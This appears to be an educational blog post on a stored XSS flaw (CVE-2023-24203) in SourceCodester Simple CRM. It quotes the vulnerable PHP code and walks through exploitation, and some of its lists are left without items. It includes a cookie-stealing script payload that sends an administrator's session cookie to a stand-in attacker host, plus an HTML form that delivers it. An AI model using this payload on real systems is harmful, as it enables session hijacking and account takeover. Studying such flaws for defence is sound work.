
Educational analysis of CVE-2023-24203 (Stored XSS) and CVE-2023-24204 (SQL Injection) in SourceCodester CRM, with exploitation steps and mitigation strategies.
In the ever-evolving landscape of cybersecurity, web applications remain a prime target for attackers seeking to exploit vulnerabilities. Recently, two critical vulnerabilities were discovered in the SourceCodester Simple Customer Relationship Management (CRM) System v1.0: CVE-2023-24203 and CVE-2023-24204. These vulnerabilities, involving Cross-Site Scripting (XSS) and SQL Injection, pose significant risks including arbitrary code execution and unauthorized access. Understanding these vulnerabilities and their impacts is essential for developers and security professionals to safeguard systems from potential threats.
Cross-Site Scripting (XSS) is a type of vulnerability that occurs when a web application allows users to inject malicious scripts into web pages viewed by other users. This can lead to unauthorized actions on behalf of the user, data theft, and further exploitation. XSS vulnerabilities can be classified into three main types:
SQL Injection is a type of vulnerability that occurs when an attacker is able to manipulate SQL queries by injecting arbitrary SQL code into a query. This can lead to unauthorized access, data theft, and other malicious activities. SQL Injection typically occurs due to insufficient input validation and lack of parameterized queries. Key impacts of SQL Injection include:
In this blog post, we will delve into CVE-2023-24203 and CVE-2023-24204, exploring the specifics of these vulnerabilities, their attack vectors, impacts, and mitigation strategies. Understanding these vulnerabilities in depth is crucial for protecting your applications and data from potential exploits.
SQL Injection vulnerabilities are often a result of inadequate input validation and poor coding practices. Some common causes include:
Cross-Site Scripting (XSS) vulnerabilities are typically caused by the failure to properly handle user input and output. Common causes include:
CVE-2023-24203 is a Stored Cross-Site Scripting (XSS) vulnerability found in the get-quote.php component of the SourceCodester Simple Customer Relationship Management (CRM) System v1.0. This vulnerability allows an attacker to inject malicious scripts into the company and query parameters, which are then stored in the database and executed when viewed by an administrator, leading to arbitrary code execution.
The vulnerability resides in the get-quote.php script, which processes user input from a quote request form. The PHP source code is shown below:
<?php
session_start();
include("dbconnection.php");
include("checklogin.php");
check_login();
error_reporting(0);
if(isset($_POST['submit']))
{
$name=$_POST['name'];
$email=$_POST['email'];
$contact=$_POST['contact'];
$company=$_POST['company'];
$services=addslashes(mysqli_real_escape_string($con, json_encode($_POST['services'])));
$other=$_POST['other'];
$query=$_POST['query'];
$pd=date('Y-m-d');
mysqli_query($con,"insert into prequest(name,email,contactno,company,services,others,query,posting_date) values('$name','$email','$contact','$company','$services','$other','$query','$pd')");
echo "<script>alert('Query received. We will contact you soon.');</script>";
echo "<script>window.location.href='get-quote.php'</script>";
}
?>
The script takes user inputs from the form (name, email, contact, company, services, other, and query) and directly incorporates them into an SQL query to store the data in the database. While the services input is sanitized using mysqli_real_escape_string and addslashes, the company and query parameters are not properly sanitized or encoded when being echoed back in the response. This lack of proper sanitization and encoding allows for the injection and storage of malicious scripts in the database.
To exploit this vulnerability, an attacker can craft a payload that includes malicious JavaScript code in the company or query parameter. When the administrator views the quote request, the injected script will execute in their browser.
By submitting the following payload in the query parameter:
<script>alert('XSS');</script>
The attacker can trigger an XSS attack when the administrator views the quote request.
A more harmful payload can be crafted to steal the administrator's session cookies. By using the following payload in the query parameter:
<script>document.location='http://attacker.com/steal-cookie?cookie='+document.cookie;</script>
The attacker can send the administrator's cookies to a remote server controlled by the attacker.
Submit Malicious Quote Request: The attacker fills out the quote request form, injecting the malicious payload into the company or query field.
<form method="post" action="get-quote.php">
<input type="text" name="company" value="CompanyX"><br>
<input type="text" name="query" value="<script>document.location='http://attacker.com/steal-cookie?cookie='+document.cookie;</script>"><br>
<input type="submit" name="submit" value="Submit">
</form>
Administrator Views Request: When the administrator logs into the CRM system and views the submitted quote, the malicious script executes in their browser, sending their session cookies to the attacker's server.
Successful exploitation of this stored XSS vulnerability allows an attacker to execute arbitrary JavaScript in the context of the administrator's browser. This can lead to various malicious actions, including: